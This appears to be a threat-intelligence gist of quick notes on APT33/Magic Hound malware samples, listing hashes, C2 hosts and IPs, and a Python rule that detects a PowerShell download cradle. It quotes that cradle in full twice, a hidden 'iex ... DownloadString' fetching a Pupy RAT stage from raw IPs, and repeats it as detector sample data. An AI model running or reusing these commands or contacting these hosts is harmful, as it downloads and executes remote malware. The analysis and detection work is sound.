Blevene/3390bef46eaaa684f1b345c5b88c3d0d
Created July 2, 2019 20:17
Cyber July 2nd 2019 Quick Notes
CyberCom
https://twitter.com/CNMF_VirusAlert/status/1146130046127681536
https://customermgmt.net/page/macrocosm - 37.220.6.115 (AS 20860 (Iomart Cloud Services Limited))
b09bce085a2bbc1c0498baf3f75b48f8c86db132ebfc64d72b300f47b7435e89 - Powermet, 2017-01-14 03:35Z
> Source Doc: 528714aaaa4a083e72599c32c18aa146db503eee80da236b20aea11aa43bdf62
> Powershell: http://69.87.223.26:8080/eiloShaegae1
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/eiloShaegae1')"
> Payload: PUPY, 924b4615ba6e6ed87fad81ad4c2ae876d10a9b34fb347210a2ec7621b92005cb
> OSINT: https://www.netscout.com/blog/asert/additional-insights-shamoon2
f2bf20e7bb482d27da8f19aa0f8bd4927746a65300929b99166867074a38a4b4 - ASPX Webshell
28ebfe86217ed36ead5b429cadcd005338a0ae6207119729b53698b5e4a3ef3f - Powermet, 2017-01-06 16:50Z
> http://139.59.46.154:3485/eiloShaegae1
> "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1')"
> Intermediate stage Downloader: http://139.49.46.154:3485/IMo8oosieVai
> Downloader for PuPy
> OSINT: https://securityintelligence.com/the-full-shamoon-how-the-devastating-malware-was-inserted-into-networks/
0515cd2ba84a5da10c63cadae06f04d778d66c054b9184edb57be6ea95a1095b - JSP Code Injector
dc546dc992b31b3927e63cefbfd2716ca016ca238f6142cf16e27b240b0d7bb9 - File Uploader
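A detection check for the download cradle quoted in the two Powermet entries above, added here as an example and not part of the gist: it flags a powershell.exe command line that feeds WebClient.DownloadString into IEX, pulls out the stage-two URL and the hidden/-noni/-nop switches, and leaves a plain DownloadString-to-file alone. The sample command lines are constructed from the two cradles in the notes plus benign admin use; the function and class names are this example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Traits of the Powermet cradle quoted in the gist: hidden, non-interactive,
# no-profile powershell.exe that IEX-es a string fetched with WebClient.DownloadString.
TRAITS = {
    "hidden window":   re.compile(r"(?<![\w-])-w(?:indowstyle)?\s+hidden\b", re.I),
    "non-interactive": re.compile(r"(?<![\w-])-noni(?:nteractive)?\b", re.I),
    "no profile":      re.compile(r"(?<![\w-])-nop(?:rofile)?\b", re.I),
}
IEX = re.compile(r"\b(?:iex|invoke-expression)\b", re.I)
DOWNLOAD_STRING = re.compile(
    r"\.DownloadString\(\s*['\"](?P<url>https?://[^'\"]+)['\"]\s*\)", re.I)

@dataclass
class Finding:
    url: str                                   # stage-two URL the cradle fetches
    reasons: List[str] = field(default_factory=list)

def analyze_cmdline(cmdline: str) -> Optional[Finding]:
    """Return a Finding when a process command line matches the IEX + DownloadString cradle."""
    if "powershell" not in cmdline.lower():
        return None
    dl = DOWNLOAD_STRING.search(cmdline)
    # A DownloadString without IEX (e.g. saving a script to disk) is a different,
    # lower-confidence pattern and is deliberately not flagged by this rule.
    if dl is None or IEX.search(cmdline) is None:
        return None
    reasons = ["iex+DownloadString"] + [n for n, p in TRAITS.items() if p.search(cmdline)]
    return Finding(url=dl.group("url"), reasons=reasons)

def scan(cmdlines) -> List[Finding]:
    """Run the rule over a batch of command lines (e.g. Sysmon event 1 or 4688 data)."""
    return [f for f in map(analyze_cmdline, cmdlines) if f is not None]

# Constructed sample: the two cradles quoted in the gist plus two benign admin lines.
SAMPLE_CMDLINES = [
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/eiloShaegae1')"''',
    r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://139.59.46.154:3485/eiloShaegae1')"''',
    r'''powershell.exe -NoProfile -Command "Get-Service -Name Spooler"''',
    r'''powershell.exe -c "(New-Object Net.WebClient).DownloadString('http://intranet.example/setup.ps1') | Out-File setup.ps1"''',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_CMDLINES):
        print(f"score={len(f.reasons)} url={f.url} reasons={', '.join(f.reasons)}")
```

The switch count is a confidence score, not a requirement: a cradle that drops -w hidden still fires on the IEX + DownloadString core.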
Interesting tweets from friends:
https://twitter.com/obiwanblee/status/1146152208976584704
Associated sample is fdae4a166decf212ef9429a4fb95c60e
which is consistent with the use of the tool RULER. Related binary (2c0ade3a01d6318861d54ce94faca006) is an AutoIT executable likely used to download additional tools from hxxps://customermgmt[.]net/page/news #apt33
Activity falls under "magichound" https://unit42.paloaltonetworks.com/unit42-magic-hound-campaign-attacks-saudi-targets/
There is some contention as to whether this actor fits into APT33 or not.